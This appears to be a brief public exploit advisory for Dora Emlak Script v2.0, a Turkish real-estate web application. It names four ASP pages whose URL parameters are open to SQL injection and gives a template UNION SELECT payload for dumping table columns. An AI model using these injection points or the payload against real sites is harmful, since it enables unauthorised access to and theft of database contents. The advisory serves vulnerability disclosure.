Dora Emlak Script v2.0 SQL Injection Vulnerability

#Software: Dora Emlak Script v2.0
#Download: not free (300 YTL)  Sales: http://www.aspindir.com/goster/5027
#Demo: http://www.doraittifaki.com/dorav2/
#Found By: GeFORC3  |  G3

#Exploit:

http://www.example.com/dorav2/emlak_detay.asp?id= [SQL]
http://www.example.com/dorav2/haber_detay.asp?id= [SQL]
http://www.example.com/dorav2/kategorisirala.asp?kategori= [SQL]
http://www.example.com/dorav2/tipsirala.asp?tip= [SQL]

Example sql code = -1+union+select+columns(0,1,column name,2
etc.)+from+table name



GeFORC3.Org  |  HeykirBlog.Org / .Com  |  NetKaBus.Com